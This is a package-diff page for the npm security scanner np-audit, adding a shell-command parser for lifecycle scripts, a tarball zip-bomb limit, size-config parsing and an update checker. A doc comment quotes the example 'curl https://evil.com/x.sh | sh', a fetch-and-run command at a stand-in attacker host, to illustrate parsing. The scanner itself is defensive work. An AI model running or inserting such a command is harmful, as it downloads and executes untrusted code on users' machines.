npm - np-audit - Versions diffs - 1.4.0 → 1.5.0 - Mend

np-audit 1.4.0 → 1.5.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (10) hide show

package/README.md +82 -54
package/package.json +1 -1
package/src/cli.js +15 -0
package/src/core/detector.js +181 -37
package/src/core/requireWalker.js +192 -0
package/src/core/scanner.js +306 -48
package/src/utils/command.js +256 -0
package/src/utils/config.js +31 -2
package/src/utils/tarball.js +7 -1
package/src/utils/updateChecker.js +72 -0

package/src/utils/command.js ADDED Viewed

@@ -0,0 +1,256 @@
+'use strict';
+/**
+ * Turn a lifecycle command string into a flat list of "script references".
+ *
+ * Every reference has one of two shapes:
+ *   { kind: 'file',  path: 'install.js',  interpreter: 'node' }   — a file to analyze
+ *   { kind: 'inline', code: '...',         interpreter: 'sh' }    — a command string to analyze
+ *
+ * The command is first cut into segments at the shell separators `&&`, `||`,
+ * `;` and `|`, and each segment is then classified on its own. As a result
+ *
+ *   "node pre.js && node post.js"
+ *   "sh ./install.sh; node cleanup.js"
+ *   "curl https://evil.com/x.sh | sh"
+ *
+ * each yield several references, whereas earlier versions of np-audit only
+ * extracted the first `node` invocation and ignored the rest.
+ *
+ * Quoted string literals are never split, so an argument such as
+ * `-e "a && b"` stays in one piece.
+ *
+ * @param {string} command  Raw lifecycle script text.
+ * @returns {Array<object>} References in command order; an empty array when
+ *   `command` is empty or not a string.
+ */
+function parseCommand(command) {
+  const isUsable = typeof command === 'string' && command.length > 0;
+  if (!isUsable) return [];
+  return splitOnShellSeparators(command.trim())
+    .filter(Boolean)
+    .flatMap((piece) => classifySegment(piece));
+}
+/**
+ * Split a command on &&, ||, ; and | — respecting single, double, and backtick
+ * quotes as well as backslash escapes.
+ *
+ * Backslash handling follows POSIX shell quoting:
+ *   - inside single quotes a backslash is an ordinary character, so `'a\'`
+ *     is a complete string and whatever follows it is still split;
+ *   - inside double quotes and backticks it protects the next character, so
+ *     an escaped quote does not end the string;
+ *   - outside quotes it protects the next character, so `\;` and `\|` are
+ *     not treated as separators.
+ *
+ * Segments keep their original quoting and escapes; they are trimmed and
+ * empty segments are dropped.
+ *
+ * @param {string} cmd  Command string to split.
+ * @returns {string[]} Non-empty, trimmed segments in source order.
+ */
+function splitOnShellSeparators(cmd) {
+  const out = [];
+  let buf = '';
+  let quote = null; // null | "'" | '"' | '`'
+  for (let i = 0; i < cmd.length; i++) {
+    const c = cmd[i];
+    // Escapes apply everywhere except inside single quotes. Treating `\'` as an
+    // escape there would keep the quote open and hide every later command.
+    if (c === '\\' && quote !== "'" && i + 1 < cmd.length) {
+      buf += c + cmd[i + 1];
+      i++;
+      continue;
+    }
+    if (quote) {
+      if (c === quote) quote = null;
+      buf += c;
+      continue;
+    }
+    if (c === '"' || c === "'" || c === '`') {
+      quote = c;
+      buf += c;
+      continue;
+    }
+    // && and ||
+    if ((c === '&' || c === '|') && cmd[i + 1] === c) {
+      out.push(buf);
+      buf = '';
+      i++;
+      continue;
+    }
+    // single | (pipe) and ; — also segment boundaries for our purposes:
+    // a pipe `foo | sh` clearly has two commands; a sequence `a ; b` too.
+    if (c === '|' || c === ';') {
+      out.push(buf);
+      buf = '';
+      continue;
+    }
+    buf += c;
+  }
+  out.push(buf);
+  return out.map(s => s.trim()).filter(Boolean);
+}
+/**
+ * Classify a single shell segment into one or more script references.
+ *
+ * The first token selects the branch; only its basename is compared, so
+ * "./node_modules/.bin/tsx" is handled as "tsx":
+ *   node / nodejs                → classifyNodeInvocation
+ *   tsx / ts-node / bun / deno   → -e/--eval/-p/--print and `deno eval` give
+ *                                  inline code; otherwise the first non-flag
+ *                                  argument is the script file. A leading `run`
+ *                                  subcommand of bun/deno is skipped.
+ *   sh / bash / zsh / dash       → classifyShellInvocation
+ *   python* / ruby / perl / php  → -c / -e give inline code; otherwise the
+ *                                  first non-flag argument is the script file
+ *   a script path run directly   → file with interpreter 'auto'
+ *   npx                          → inline, marked with `npx: true`
+ *   anything else                → inline with interpreter 'shell'
+ *
+ * @param {string} segment  One command, without shell separators.
+ * @returns {Array<object>} Script references; empty when the segment has no tokens.
+ */
+function classifySegment(segment) {
+  const tokens = tokenize(segment);
+  if (tokens.length === 0) return [];
+  const cmd = tokens[0];
+  // Resolve common path-prefix wrappers
+  // e.g. "./node_modules/.bin/foo" → "foo"
+  const cmdBase = cmd.split('/').pop();
+  // Node interpreters
+  if (cmdBase === 'node' || cmdBase === 'nodejs') {
+    return classifyNodeInvocation(tokens.slice(1), segment);
+  }
+  // Other JS runtimes
+  if (cmdBase === 'tsx' || cmdBase === 'ts-node' || cmdBase === 'bun' || cmdBase === 'deno') {
+    const args = tokens.slice(1);
+    let first = 0;
+    if (cmdBase === 'deno' && args[0] === 'eval') {
+      // `deno eval [flags] "code"` — the first non-flag argument is the code itself
+      const code = args.slice(1).find(t => !t.startsWith('-'));
+      return [{ kind: 'inline', code: code !== undefined ? code : segment, interpreter: cmdBase }];
+    }
+    if ((cmdBase === 'bun' || cmdBase === 'deno') && args[0] === 'run') {
+      // `run` is a subcommand, not the script; the script follows it.
+      // NOTE(review): `bun run <name>` may also name a package.json script;
+      // such a target is still reported as a file path here.
+      first = 1;
+    }
+    for (let i = first; i < args.length; i++) {
+      const a = args[i];
+      // Eval-style flags: the next argument is code, not a path
+      if (a === '-e' || a === '--eval' || a === '-p' || a === '--print') {
+        return [{ kind: 'inline', code: args[i + 1] || '', interpreter: cmdBase }];
+      }
+      if (a.startsWith('-')) continue;
+      return [{ kind: 'file', path: stripDotSlash(a), interpreter: cmdBase }];
+    }
+    return [{ kind: 'inline', code: segment, interpreter: cmdBase }];
+  }
+  // Shell-script interpreters
+  if (cmdBase === 'sh' || cmdBase === 'bash' || cmdBase === 'zsh' || cmdBase === 'dash') {
+    return classifyShellInvocation(tokens.slice(1), segment);
+  }
+  // Python and friends
+  if (cmdBase === 'python' || cmdBase === 'python2' || cmdBase === 'python3'
+      || cmdBase === 'ruby' || cmdBase === 'perl' || cmdBase === 'php') {
+    const args = tokens.slice(1);
+    for (let i = 0; i < args.length; i++) {
+      const a = args[i];
+      // -c "code", -e "code" — execute the next argument as code
+      if (a === '-c' || a === '-e') {
+        return [{ kind: 'inline', code: args[i + 1] || '', interpreter: cmdBase }];
+      }
+      if (a.startsWith('-')) continue;
+      return [{ kind: 'file', path: stripDotSlash(a), interpreter: cmdBase }];
+    }
+    return [{ kind: 'inline', code: segment, interpreter: cmdBase }];
+  }
+  // Script files invoked directly (shebang): .js/.mjs/.cjs/.sh/.bash/.py/.rb/.pl
+  if (/\.(?:js|mjs|cjs|sh|bash|py|rb|pl)$/.test(cmdBase)) {
+    return [{ kind: 'file', path: stripDotSlash(cmd), interpreter: 'auto' }];
+  }
+  // npx — running an arbitrary package. We can't statically know which file
+  // it executes, but the command string itself is worth surfacing.
+  if (cmdBase === 'npx') {
+    return [{ kind: 'inline', code: segment, interpreter: 'shell', npx: true }];
+  }
+  // Anything else (curl, wget, cd, env, …): keep as inline so it shows up in
+  // the report and is run through the obfuscation checks at least as a string.
+  return [{ kind: 'inline', code: segment, interpreter: 'shell' }];
+}
+/**
+ * Handle `node <args...>`. Cases:
+ *   node script.js              → file
+ *   node -e "..."               → inline (the code IS the argument)
+ *   node -p "..."               → inline
+ *   node -pe "..."              → inline (combined print + eval)
+ *   node --eval "..."           → inline
+ *   node --experimental-foo s.js → file (skip flags, pick first non-flag)
+ *
+ * @param {string[]} args         Tokens after the `node` command itself.
+ * @param {string}   fullSegment  The whole segment, used when neither a file
+ *                                nor an eval flag is present.
+ * @returns {Array<object>} Exactly one script reference.
+ */
+function classifyNodeInvocation(args, fullSegment) {
+  // `-pe` must be recognized explicitly: treated as a plain flag it would be
+  // skipped and the code after it would be reported as a script path.
+  const evalFlags = ['-e', '--eval', '-p', '--print', '-pe'];
+  for (let i = 0; i < args.length; i++) {
+    const a = args[i];
+    if (evalFlags.includes(a)) {
+      const code = args[i + 1] || '';
+      return [{ kind: 'inline', code: stripQuotes(code), interpreter: 'node' }];
+    }
+    if (a.startsWith('-')) continue;
+    // First non-flag token is the script file
+    return [{ kind: 'file', path: stripDotSlash(a), interpreter: 'node' }];
+  }
+  // No file, no -e — fall through to inline
+  return [{ kind: 'inline', code: fullSegment, interpreter: 'node' }];
+}
+/**
+ * Handle `sh <args...>`. Cases:
+ *   sh script.sh                → file (the .sh file is fetched & scanned)
+ *   sh -c "..."                 → inline (the code IS the argument)
+ *   bash -lc "..."              → inline (`c` may sit in a flag cluster)
+ *   bash -euo pipefail -c "..." → inline (the value of -o/-O is skipped)
+ *   sh -x script.sh             → file (flags skipped)
+ *
+ * The interpreter is reported as 'sh' for every shell.
+ *
+ * @param {string[]} args         Tokens after the shell command itself.
+ * @param {string}   fullSegment  The whole segment, used when there is neither
+ *                                a script operand nor a -c flag.
+ * @returns {Array<object>} Exactly one script reference.
+ */
+function classifyShellInvocation(args, fullSegment) {
+  let wantsCode = false;
+  for (let i = 0; i < args.length; i++) {
+    const a = args[i];
+    // Single-dash cluster such as -c, -lc, -euxc, -eo
+    if (/^-[A-Za-z]+$/.test(a)) {
+      if (a.includes('c')) wantsCode = true;
+      // -o / -O take an option name as the next argument; it is not a script
+      if (/[oO]/.test(a)) i++;
+      continue;
+    }
+    if (a.startsWith('-')) continue;
+    // First operand: the command string after -c, otherwise the script file
+    if (wantsCode) {
+      return [{ kind: 'inline', code: stripQuotes(a), interpreter: 'sh' }];
+    }
+    return [{ kind: 'file', path: stripDotSlash(a), interpreter: 'sh' }];
+  }
+  if (wantsCode) {
+    // -c given without a command string
+    return [{ kind: 'inline', code: '', interpreter: 'sh' }];
+  }
+  return [{ kind: 'inline', code: fullSegment, interpreter: 'sh' }];
+}
+/**
+ * Lightweight shell-style tokenizer — respects single, double, backtick quotes
+ * and \-escapes. Does NOT do variable expansion (we want the literal command
+ * the way npm would hand it to /bin/sh).
+ *
+ * Quoting rules applied:
+ *   - single quotes and backticks: everything up to the closing quote is literal;
+ *   - double quotes: a backslash is only an escape before $, `, ", \ or a
+ *     newline (backslash-newline is removed); before any other character the
+ *     backslash is kept, so "scripts\install.js" keeps its backslash;
+ *   - outside quotes: a backslash makes the next character literal.
+ * An empty quoted string ("" or '') produces an empty token instead of being
+ * dropped, so the arguments that follow it keep their positions.
+ *
+ * @param {string} s  One command segment.
+ * @returns {string[]} Tokens with quotes and escape characters removed.
+ */
+function tokenize(s) {
+  const out = [];
+  const dqEscapable = '$`"\\\n';
+  let buf = '';
+  let quote = null;
+  let inToken = false; // true once the current token has started, even if still empty
+  for (let i = 0; i < s.length; i++) {
+    const c = s[i];
+    if (quote) {
+      if (quote === '"' && c === '\\' && i + 1 < s.length && dqEscapable.includes(s[i + 1])) {
+        // backslash-newline is a line continuation and contributes nothing
+        if (s[i + 1] !== '\n') buf += s[i + 1];
+        i++;
+        continue;
+      }
+      if (c === quote) { quote = null; continue; }
+      buf += c;
+      continue;
+    }
+    if (c === '"' || c === "'" || c === '`') {
+      quote = c;
+      inToken = true;
+      continue;
+    }
+    if (c === '\\' && i + 1 < s.length) {
+      buf += s[i + 1];
+      inToken = true;
+      i++;
+      continue;
+    }
+    if (/\s/.test(c)) {
+      if (inToken) { out.push(buf); buf = ''; inToken = false; }
+      continue;
+    }
+    buf += c;
+    inToken = true;
+  }
+  if (inToken) out.push(buf);
+  return out;
+}
+/**
+ * Drop a single leading "./" from a path; any other path is returned as is.
+ * @param {string} p
+ * @returns {string}
+ */
+function stripDotSlash(p) {
+  return p.startsWith('./') ? p.slice(2) : p;
+}
+/**
+ * Remove one pair of matching outer quotes (", ' or `) from a string.
+ * Strings shorter than two characters, or whose first and last characters
+ * are not the same quote character, are returned unchanged.
+ * @param {string} s
+ * @returns {string}
+ */
+function stripQuotes(s) {
+  if (s.length < 2) return s;
+  const first = s[0];
+  const last = s[s.length - 1];
+  const opensWithQuote = first === '"' || first === "'" || first === '`';
+  return opensWithQuote && first === last ? s.slice(1, -1) : s;
+}
+module.exports = { parseCommand, splitOnShellSeparators, tokenize };

package/src/utils/config.js CHANGED Viewed

@@ -15,6 +15,8 @@ const DEFAULT_CONFIG = Object.freeze({
   skipScopes:      [],
   skipPackages:    [],
   silent:          false,
+  scanSelf:        true,
+  maxTarballSize:  '50MB', // Max unpacked tarball size (e.g. '5MB', '1GB', or bytes as number)
 });
 const VALID_KEYS = new Set(Object.keys(DEFAULT_CONFIG));
@@ -29,17 +31,44 @@ function readJSON(filePath) {
 function loadConfig(cwd) {
+  // Start from a shallow copy so the frozen DEFAULT_CONFIG itself is never mutated.
   const base    = { ...DEFAULT_CONFIG };
+  // Parse the default maxTarballSize string to bytes
+  base.maxTarballSize = parseSize(base.maxTarballSize);
+  // A falsy result from readJSON is replaced by an empty object.
   const global_ = readJSON(GLOBAL_CONFIG_PATH) || {};
+  // The project-local file is only consulted when a working directory is given.
   const local   = cwd ? readJSON(path.join(cwd, '.npmauditor.json')) || {} : {};
+  // Precedence, lowest to highest: defaults, global config, local config.
+  // Both user-supplied layers go through coerce() before being merged.
   return Object.assign(base, coerce(global_), coerce(local));
 }
+/**
+ * Parse a size limit to a whole number of bytes.
+ *
+ * Strings take the form '<number><unit>' with an optional unit of B, KB, MB
+ * or GB (case-insensitive, 1024-based), e.g. '5MB', '1GB', '500KB', '1.5 kb'.
+ * A string without a unit is read as bytes. Numbers are taken as bytes.
+ *
+ * Every accepted value — numeric or string — is floored, clamped to be
+ * non-negative and capped at the machine's total memory. Unparseable
+ * strings, NaN and values of any other type yield 0.
+ *
+ * @param {string|number} value
+ * @returns {number} Size in bytes
+ */
+function parseSize(value) {
+  let bytes;
+  if (typeof value === 'number') {
+    bytes = value;
+  } else if (typeof value === 'string') {
+    const match = value.trim().match(/^(\d+(?:\.\d+)?)\s*(B|KB|MB|GB)?$/i);
+    if (!match) return 0;
+    const multipliers = { B: 1, KB: 1024, MB: 1024 ** 2, GB: 1024 ** 3 };
+    const unit = (match[2] || 'B').toUpperCase();
+    bytes = parseFloat(match[1]) * multipliers[unit];
+  } else {
+    return 0;
+  }
+  // NaN compares false against everything, so letting it through would
+  // silently switch off any `size > limit` check that uses the result.
+  if (Number.isNaN(bytes)) return 0;
+  // Cap at available RAM to prevent out-of-memory
+  const totalMem = os.totalmem();
+  return Math.min(Math.max(0, Math.floor(bytes)), totalMem);
+}
 function coerce(obj) {
   const result = {};
   for (const [key, val] of Object.entries(obj)) {
     if (!VALID_KEYS.has(key)) continue;
     const def = DEFAULT_CONFIG[key];
-    if (Array.isArray(def)) {
+    if (key === 'maxTarballSize') {
+      result[key] = parseSize(val);
+    } else if (Array.isArray(def)) {
       result[key] = Array.isArray(val) ? val : [val];
     } else if (typeof def === 'number') {
       const n = Number(val);
@@ -71,4 +100,4 @@ function getGlobalConfigPath() {
   return GLOBAL_CONFIG_PATH;
 }
-module.exports = { loadConfig, setGlobalConfig, getGlobalConfigPath, DEFAULT_CONFIG, VALID_KEYS };
+module.exports = { loadConfig, setGlobalConfig, getGlobalConfigPath, DEFAULT_CONFIG, VALID_KEYS, parseSize };

package/src/utils/tarball.js CHANGED Viewed

@@ -9,11 +9,13 @@ const BLOCK_SIZE = 512;
  * Pure Node.js — no external dependencies.
  * Handles GNU long name (typeflag 'L') and POSIX ustar extended headers (typeflag 'x').
  * @param {Buffer} gzipBuffer
+ * @param {number} [maxSize] Maximum total unpacked size in bytes
  * @returns {Map<string, Buffer>}
  */
-function parseTarGz(gzipBuffer) {
+function parseTarGz(gzipBuffer, maxSize = null) {
   const tar = zlib.gunzipSync(gzipBuffer);
   const files = new Map();
+  let totalUnpackedSize = 0;
   let offset = 0;
   let pendingLongName = null;
@@ -56,6 +58,10 @@ function parseTarGz(gzipBuffer) {
     name = name.replace(/\0/g, '');
     if ((typeFlag === '0' || typeFlag === '\0') && size > 0) {
+      totalUnpackedSize += size;
+      if (maxSize !== null && maxSize !== undefined && totalUnpackedSize > maxSize) {
+        throw new Error(`Tarball unpacked size (${totalUnpackedSize} bytes) exceeds limit (${maxSize} bytes) — potential zip bomb`);
+      }
       files.set(name, tar.slice(offset, offset + size));
     }

package/src/utils/updateChecker.js ADDED Viewed

@@ -0,0 +1,72 @@
+'use strict';
+const fs   = require('fs');
+const path = require('path');
+const os   = require('os');
+// File in the user's home directory where the result of the last update check is kept.
+const CACHE_FILE = path.join(os.homedir(), '.npa-update-check');
+// Minimum time between two registry lookups: 2 days, expressed in milliseconds.
+const CHECK_INTERVAL = 2 * 24 * 60 * 60 * 1000;
+/**
+ * Check for a newer version of np-audit on the registry.
+ * Best-effort — swallows all errors and returns null on failure.
+ *
+ * A cached answer is reused when it is well-formed (numeric `lastCheck`,
+ * string `latestVersion`) and was written within the last CHECK_INTERVAL.
+ * A malformed cache, or one stamped in the future, is treated as stale, so it
+ * cannot suppress the check. Otherwise the registry is queried and a usable
+ * `dist-tags.latest` value is written back to the cache.
+ *
+ * @param {object} config  Must have a `registry` key (trailing slashes are
+ *   tolerated). The request timeout is fixed at 5000 ms; `config.timeout`
+ *   is not consulted.
+ * @param {string} currentVersion  The currently installed version.
+ * @returns {Promise<string|null>} The latest version if newer, or null.
+ */
+async function checkForUpdate(config, currentVersion) {
+  try {
+    const cache = readCache();
+    const now = Date.now();
+    const cacheUsable = cache !== null && typeof cache === 'object'
+      && typeof cache.latestVersion === 'string'
+      && Number.isFinite(cache.lastCheck)
+      && cache.lastCheck <= now
+      && (now - cache.lastCheck) < CHECK_INTERVAL;
+    if (cacheUsable) {
+      return isNewer(cache.latestVersion, currentVersion) ? cache.latestVersion : null;
+    }
+    const { fetchJSON } = require('./fetcher');
+    // Avoid "//np-audit" when the configured registry ends with a slash
+    const registry = String(config.registry).replace(/\/+$/, '');
+    const meta = await fetchJSON(`${registry}/np-audit`, { timeout: 5000 });
+    const latest = meta && meta['dist-tags'] && meta['dist-tags'].latest;
+    // Only a non-empty string is worth caching or comparing
+    if (typeof latest !== 'string' || latest === '') return null;
+    writeCache({ lastCheck: now, latestVersion: latest });
+    return isNewer(latest, currentVersion) ? latest : null;
+  } catch {
+    return null;
+  }
+}
+/**
+ * Compare two semver strings. Returns true if `a` is newer than `b`.
+ *
+ * Comparison follows semver precedence:
+ *   - a leading "v" and any "+build" metadata are ignored;
+ *   - major, minor and patch are compared numerically (missing or
+ *     non-numeric parts count as 0);
+ *   - with equal x.y.z, a stable version is newer than a pre-release;
+ *   - two pre-releases are compared identifier by identifier: numeric
+ *     identifiers numerically, others as strings, numeric ranking below
+ *     non-numeric, and the longer list winning when one is a prefix of the other.
+ *
+ * @param {string} a
+ * @param {string} b
+ * @returns {boolean}
+ */
+function isNewer(a, b) {
+  const parse = (version) => {
+    // Build metadata may itself contain "-", so it is removed before looking for a pre-release tag
+    const [withoutBuild] = version.trim().replace(/^v/i, '').split('+');
+    const dash = withoutBuild.indexOf('-');
+    const core = dash === -1 ? withoutBuild : withoutBuild.slice(0, dash);
+    return {
+      nums: core.split('.').map(s => parseInt(s, 10) || 0),
+      pre: dash === -1 ? [] : withoutBuild.slice(dash + 1).split('.'),
+    };
+  };
+  const va = parse(a);
+  const vb = parse(b);
+  for (let i = 0; i < 3; i++) {
+    const x = va.nums[i] || 0;
+    const y = vb.nums[i] || 0;
+    if (x !== y) return x > y;
+  }
+  // Same x.y.z — pre-release (e.g. "beta") is older than stable
+  if (va.pre.length === 0 || vb.pre.length === 0) {
+    return va.pre.length === 0 && vb.pre.length > 0;
+  }
+  const numeric = /^\d+$/;
+  const shared = Math.min(va.pre.length, vb.pre.length);
+  for (let i = 0; i < shared; i++) {
+    const ia = va.pre[i];
+    const ib = vb.pre[i];
+    if (ia === ib) continue;
+    const aNumeric = numeric.test(ia);
+    const bNumeric = numeric.test(ib);
+    if (aNumeric && bNumeric) {
+      const delta = Number(ia) - Number(ib);
+      if (delta !== 0) return delta > 0;
+      continue;
+    }
+    // A numeric identifier ranks below a non-numeric one
+    if (aNumeric !== bNumeric) return bNumeric;
+    return ia > ib;
+  }
+  return va.pre.length > vb.pre.length;
+}
+/**
+ * Load the cached update-check record from CACHE_FILE.
+ * @returns {*} The parsed JSON content, or null when the file cannot be read or parsed.
+ */
+function readCache() {
+  let parsed = null;
+  try {
+    const raw = fs.readFileSync(CACHE_FILE, 'utf8');
+    parsed = JSON.parse(raw);
+  } catch {
+    // Missing, unreadable or corrupt cache — report "no cache"
+    parsed = null;
+  }
+  return parsed;
+}
+/**
+ * Persist an update-check record to CACHE_FILE as JSON.
+ * Failures (serialization or file system) are deliberately ignored.
+ * @param {*} data  Value to serialize.
+ */
+function writeCache(data) {
+  try {
+    const serialized = JSON.stringify(data);
+    fs.writeFileSync(CACHE_FILE, serialized, 'utf8');
+  } catch {
+    // Non-critical — ignore write failures
+  }
+}
+module.exports = { checkForUpdate, isNewer, CHECK_INTERVAL, CACHE_FILE };